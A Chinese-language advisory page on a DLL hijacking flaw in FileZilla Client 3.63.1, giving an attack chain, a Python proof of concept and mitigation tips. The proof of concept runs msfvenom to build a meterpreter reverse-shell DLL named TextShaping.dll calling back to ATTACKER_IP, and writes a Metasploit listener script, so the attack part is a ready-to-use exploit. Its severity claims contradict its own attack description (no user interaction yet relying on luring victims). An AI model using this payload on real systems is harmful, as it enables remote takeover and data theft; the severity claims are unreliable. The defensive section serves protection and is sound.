CVE-2023-53959: FileZilla Client DLL劫持远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2023-53959

漏洞类型

DLL劫持

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FileZilla Client

漏洞概述

CVE-2023-53959是FileZilla Project开发的FileZilla Client 3.63.1版本中存在的一个严重安全漏洞，CVSS评分高达9.8分（满分10分）。该漏洞属于DLL劫持（DLL Hijacking）类型，攻击者可以利用Windows操作系统的DLL加载机制缺陷，在应用程序目录中植入恶意构造的TextShaping.dll文件。当FileZilla Client启动时，会自动加载目录中存在的TextShaping.dll文件，如果该文件被替换为恶意代码，攻击者即可实现远程代码执行（RCE）。由于FileZilla是一款广泛使用的开源FTP客户端软件，用户基数庞大，该漏洞的潜在影响范围极广。攻击者只需诱骗用户下载并运行特定版本的FileZilla Client，或通过社会工程学手段让用户执行包含恶意DLL的压缩包，即可获得目标系统的完全控制权。此漏洞无需任何认证凭证，也不要求用户交互，属于最严重的安全缺陷类别。

技术细节

该漏洞的根源在于Windows操作系统的DLL搜索路径顺序机制。当应用程序尝试加载动态链接库时，系统会按照特定顺序在多个目录中搜索目标DLL文件。FileZilla Client在启动过程中会调用TextShaping.dll中的函数来执行文本渲染操作，但该DLL文件并未随软件一同分发，导致应用程序在当前目录中查找此DLL时存在不确定性。攻击者可以利用这一特性，将包含恶意代码的TextShaping.dll文件放置在FileZilla安装目录或可执行文件所在目录。当FileZilla Client启动时，Windows会优先加载应用目录中的恶意DLL而非系统目录中的合法版本。攻击者通常使用msfvenom工具生成Windows可执行格式的反弹shell载荷，然后将其编译或打包为DLL文件。一旦恶意DLL被成功加载，攻击者即可在受害者主机上执行任意命令，建立远程控制会话，实现对目标系统的持久化控制和数据窃取。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统是否安装了存在漏洞的FileZilla Client版本（3.63.1），并确定其安装路径

STEP 2

步骤2: 载荷生成

攻击者使用msfvenom工具生成Windows x64架构的反弹shell有效载荷，指定目标主机的IP地址和监听端口

STEP 3

步骤3: 恶意DLL构造

将msfvenom生成的有效载荷编译或转换为DLL文件格式，并命名为TextShaping.dll

STEP 4

步骤4: 恶意DLL投递

通过钓鱼邮件、恶意下载链接、供应链攻击或其他社会工程学手段，将恶意DLL文件投递到目标系统的FileZilla安装目录

STEP 5

步骤5: 触发漏洞

等待或诱骗受害者启动FileZilla Client应用程序，此时应用程序会自动加载当前目录下的恶意TextShaping.dll

STEP 6

步骤6: 远程代码执行

恶意DLL被加载后执行其中的恶意代码，建立从目标主机到攻击者控制服务器的反弹TCP连接

STEP 7

步骤7: 持久化控制

攻击者通过建立的Meterpreter会话获得目标系统的完全控制权，可执行任意命令、窃取数据或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2023-53959 FileZilla Client DLL Hijacking PoC
# Author: Vulnerability Research
# Description: Generate malicious TextShaping.dll for FileZilla Client DLL hijacking

import os
import sys

def generate_msfvenom_payload():
    """
    Generate reverse shell payload using msfvenom
    Replace the legitimate TextShaping.dll with this malicious DLL
    """
    lhost = "ATTACKER_IP"  # Replace with attacker IP
    lport = "4444"         # Replace with listener port
    
    # Generate Windows DLL payload (reverse TCP meterpreter)
    cmd = f'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={lhost} LPORT={lport} -f dll > TextShaping.dll'
    print(f"[!] Execute: {cmd}")
    os.system(cmd)
    
    print("[*] Malicious TextShaping.dll generated successfully")
    print(f"[*] Place the DLL in FileZilla Client installation directory")
    print(f"[*] Default path: C:\\Program Files\\FileZilla FTP Client\\")

def create_listener_script():
    """
    Generate Metasploit listener resource script
    """
    listener_script = '''use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT 4444
set ExitOnSession false
exploit -j -z
'''
    with open('listener.rc', 'w') as f:
        f.write(listener_script)
    print("[*] Listener script created: listener.rc")
    print("[*] Run: msfconsole -r listener.rc")

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2023-53959 FileZilla Client DLL Hijacking PoC")
    print("=" * 60)
    generate_msfvenom_payload()
    create_listener_script()
    print("\n[!] Warning: This PoC is for educational and authorized testing purposes only")

影响范围

FileZilla Client < 3.64.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）立即检查FileZilla安装目录是否存在可疑的TextShaping.dll文件，如有发现立即删除；2）将FileZilla安装目录设置为只读权限，防止恶意文件写入；3）启用Windows资源保护（WRP）机制保护系统关键文件；4）使用应用程序控制策略（如Windows AppLocker）限制未知DLL的加载；5）提高员工安全意识，警惕通过非官方渠道下载的软件；6）考虑暂时使用其他安全的FTP客户端替代方案。